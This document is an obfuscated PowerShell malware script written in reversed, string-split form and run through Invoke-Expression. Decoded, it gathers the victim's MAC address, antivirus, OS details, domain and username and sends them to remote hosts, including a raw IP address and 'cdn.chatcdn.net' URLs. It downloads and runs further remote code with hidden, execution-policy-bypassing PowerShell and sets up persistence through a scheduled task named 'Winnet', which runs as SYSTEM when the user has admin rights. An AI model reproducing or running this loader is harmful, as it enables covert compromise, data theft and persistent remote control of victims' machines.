iNvoKE-expRESSIoN( (-jOin[Regex]::MaTCHEs(")'x'+]03[eMohSP$+]4[emOHsP$ ( & | )63]rahC[,'hwx'eCALPer- 29]rahC[,'cQM' ECALpERc-  421]rahC[,)56]rahC[+57]rahC[+101]rahC[(ECALpERc- 43]rahC[,'C64' 
 eCALPer-93]rahC[,'gPv' eCALPer-  )'

diphwx llik

))02..1( tce'+'jbotupni- modnar-teg( p'+'eels'+'

}{hctac}

}{esle}	

C64spnohwxC64 tsiLtnemugrA- exe.dmc htaPeliF- ssecorP-tratS	

gPvC64gPv + C64)gPvC64 + yekhwx + C64&v?gnp.etadpu/102.261.661.881//:ptthC64 + C64g'+'Pv(gnirts'+'daolnwod.)tneilCbeW.teN tcejbO-weN( XEIC64 + gPvC64gPv + C64 c- ssapyb pe- neddih w- pon- lle
hsrewop c/C64 = spnohwx	

{)0 qe- htgnel.nurhwx(fi	

C64gnp.etadpuC64 nrettaP- gnirtS-tceleS AKe enildnammoc '+'tceles AKe ssecorP_23niW tcejbOimW-teG = nurhwx	

{yrt

))03..1( tcej'+'botupni- modnar-teg'+'( peels


}{esle}

C64tenniWC64 nt/ nur/ sksathcs'+'&	

}	

}{hctac}		

C64cexecshwxC64 tsiLtnemugrA- exe.sks'+'athcs htaPeli'+'F- ssecorP-tratS		

gPvF/ C64'+'gPv + C64edocbhwx e- ssapyb pe- llehsrewopC64 + gPvC64gPv + C64 rt/ tenniW nt/ 54 om/ ETUNIM cs/ etaerc/C64 = cexe'+'cshwx		

)setyBhwx(gnirtS46e'+'saBoT::]trevnoC'+'[ = edocbhwx		

)txeThwx(setyBteG.edocinU::]gnidocnE.txeT.metsyS[ = setyBhwx		

C64)gPvC64 + tdhwx + '+'C64wol?p/t'+'en.ndctahc.n'+'dc//:ptthgPv(gnirtsdaolnwod.)tneilCbeW.teN tcejbO-weN( XEIC64 = txeThwx		

{yrt		

{esle}	

}{hctac}		

C64cexecshwxC64 tsiLtn'+'emugrA- exe.sksathcs htaPeliF- ssecorP-tratS		

gPvF/ C64gPv + C64edocbhwx e- ssapyb pe-'+' llehsrewopC64 '+'+ gPvC64gPv + C64 rt/ te'+'nniW nt/ 54 om/ ETUNIM cs/ metsys ur/ etaerc/C64 = cexecshwx		

)se'+'tyBhwx(gnirtS46esaBoT::]trevnoC[ = edocbhwx	'+'	

)txeThwx('+'setyBteG.edocinU::]gnidocnE.txeT.metsyS[ = setyBhwx		

C64)gPvC64 + tdhwx + C64gih?p/t'+'en.'+'ndctahc'+'.ndc//:ptthg'+'Pv(gnirtsdaolnwo'+'d.)tneilCbeW.teN tc'+'ejbO-weN( XEIC64 = txeThwx		

{yrt		

{)timreph'+'wx(fi	

elif epyt- htaphwx metI-weN	

{)gPveslaFgPv qe- galfhwx(fi

galfexehwx + C64=SP'+'&C64 + EMANRESU:vnehwx + C64=resu&C64 + niamoD.)metsysretupmoc_23niw tcejbOimW-teG( + C64=niamod&C64 + galfhwx + C64=2galf&C64 + erutce'+'tihcrASO.)me'+'tsySgnitarepO_'+
'23niW tcejbOimW-teG(+C6'+'4=tib&C64+noisrev.)metsySgnitarepO_23niW ssalC-'+' tcejbOimW-teG(+C64=noisrev&C64+vahwx+C64=va&C64+camhwx+C64=camC64 = yekhwx

)C64rotartsinimdAC6'+'4 ]eloRnItliuBswodniW.lapicnirP.ytiruceS[(eloRnIsI.))(tnerruCteG::]ytitnedIswodniW.lapicnirP.ytiruceS[]lapicnirPswodniW.lapicnirP.ytiruceS[(  = timrephwx

htaphwx htap'+'-tset = galfhwx]'+'gnirts[

C64gol.ccccQMcQMpmet:vnehwxC64 = htaphwx

gPvddMMyygPv tamroF- etaD-teG = t'+'dhwx


}{hctac'+'}

)'+'galfexehwx]f'+'er[,ema'+'n'+'hwx,eurt'+'hwx( xetuM.gnidaerhT.metsyS tcejbO-weN	

esalfhwx = galfexehwx	

gPvCEXESPcQMlabolGgPv = emanhwx	

{yrt

)CAM dnapxe- tcejbo-tcelesAKeCAM r'+'edaeH- vsC-morFtrevnoC AKe1 tsrif- 1 pikS- tcejbO-tceleSAKe'+'VSC OF/ camteg( = camhwx]gnirts['((" ,'.' ,'rIGhtTOlEFt') ) )
